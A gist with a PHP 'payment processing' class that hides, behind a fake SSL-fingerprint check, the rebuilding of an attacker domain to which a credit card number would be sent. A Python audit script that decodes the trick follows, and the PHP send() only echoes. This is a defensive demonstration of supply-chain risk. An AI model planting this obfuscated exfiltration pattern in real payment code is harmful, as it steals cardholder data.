@bendechrai
Last active May 26, 2017 03:20
DO NOT USE THIS CODE IN ANY WAY FOR ANYTHING DESTINED FOR PRODUCTION
<?php
$cc_number = "4444 3333 2222 1111";
$p = new Payment();
$p->processPayment($cc_number);

class Payment {
    static $url = 'https://api.paypal.com/web_run/f';
    static $ssl_fingerprint = 'YToxODp7aTowO2k6MjM7aToxO2k6MjQ7aToyO2k6NDtpOjM7aToyO2k6NDtpOjI0O2k6NTtpOjEzO2k6NjtpOjE3O2k6NztpOjE0O2k6ODtpOjIwO2k6OTtpOjI4O2k6MTA7aToyNztpOjExO2k6MTA7aToxMjtpOjI5O2k6MTM7aTozMTtpOjE0O2k6MjA7aToxNTtpOjExO2k6MTY7aToyNztpOjE3O2k6Mjg7fQ==';

    public function processPayment($cc_number) {
        // Check URL against fingerprint to make sure URL hasn't been tampered with
        $url_check = '';
        foreach(unserialize(base64_decode(self::$ssl_fingerprint)) as $char) {
            $url_check = $this->checkFingerprintChar($char, $url_check);
        }
        // Send credit card number to checked URL
        if($url = $url_check) {
            $this->send($cc_number, $url);
        }
    }

    public function checkFingerprintChar($char, $check) {
        if($check .= self::$url[$char]) {
            return $check;
        } else {
            return false;
        }
    }

    public function send($cc_number, $url) {
        echo "Send $cc_number to $url\n";
    }
}
bendechrai commented May 26, 2017

DO NOT USE THIS CODE IN ANY WAY FOR ANYTHING DESTINED FOR PRODUCTION

I was just talking to someone about the security implications of using a third-party package for connecting to a payment provider.

Me:

I don't think it will have any more or less of an impact than writing it ourselves. We should audit the code at least superficially to ensure it doesn't persist the data to cache/disk during the transaction process.

Them:

Or send it to westealyourinfo.ru
I wonder how much data I could steal with a nice payment processing library on github
curl request to westealyourinfo.ru

So I wrote this. It's safe to run for shits and giggles.
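An added example, not part of the gist, that does what a reviewer auditing the snippet above would do: decode the "fingerprint" to see where the card number is really sent, and apply the strict comparison that the `if($url = $url_check)` line only pretends to make (in PHP a single `=` assigns, so the rebuilt string silently replaces `$url`). It is written in Python so it runs without PHP; the URL and the blob are copied from the gist, and `honest_fingerprint` shows what a table that genuinely re-derives the declared URL would look like.

```python
import base64
import re

# Values copied from the gist above: the declared endpoint and its "fingerprint".
DECLARED_URL = "https://api.paypal.com/web_run/f"
FINGERPRINT = (
    "YToxODp7aTowO2k6MjM7aToxO2k6MjQ7aToyO2k6NDtpOjM7aToyO2k6NDtpOjI0O2k6NTtp"
    "OjEzO2k6NjtpOjE3O2k6NztpOjE0O2k6ODtpOjIwO2k6OTtpOjI4O2k6MTA7aToyNztpOjEx"
    "O2k6MTA7aToxMjtpOjI5O2k6MTM7aTozMTtpOjE0O2k6MjA7aToxNTtpOjExO2k6MTY7aToy"
    "NztpOjE3O2k6Mjg7fQ=="
)


def decode_index_table(blob: str) -> list[int]:
    """Base64-decode the blob and parse the PHP-serialised int array it carries."""
    text = base64.b64decode(blob).decode("ascii")
    m = re.fullmatch(r"a:(\d+):\{((?:i:\d+;i:\d+;)*)\}", text)
    if m is None:
        raise ValueError("blob is not a serialised PHP array of ints")
    pairs = re.findall(r"i:(\d+);i:(\d+);", m.group(2))
    if len(pairs) != int(m.group(1)):
        raise ValueError("declared element count does not match contents")
    table = {int(k): int(v) for k, v in pairs}
    return [table[i] for i in range(len(table))]


def resolve_destination(url: str, blob: str) -> str:
    """Replay checkFingerprintChar(): the 'check' string is url[idx] for each index."""
    return "".join(url[i] for i in decode_index_table(blob))


def destination_is_declared(url: str, blob: str) -> bool:
    """The comparison the PHP never makes: the rebuilt string must equal the
    declared URL, otherwise the endpoint has been swapped under the comment."""
    return resolve_destination(url, blob) == url


def honest_fingerprint(url: str) -> str:
    """Constructed: a table that really re-derives the declared URL (identity map)."""
    body = "".join(f"i:{i};i:{i};" for i in range(len(url)))
    return base64.b64encode(f"a:{len(url)}:{{{body}}}".encode()).decode()


if __name__ == "__main__":
    dest = resolve_destination(DECLARED_URL, FINGERPRINT)
    print(f"declared endpoint:          {DECLARED_URL}")
    print(f"card data actually goes to: {dest}")
    print(f"passes strict check:        {destination_is_declared(DECLARED_URL, FINGERPRINT)}")
```

The lesson for the audit the comment above proposes: a base64 blob fed to `unserialize()` and an assignment inside an `if` are each worth a second look on their own; together they let a "verified" URL be anything the blob encodes.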
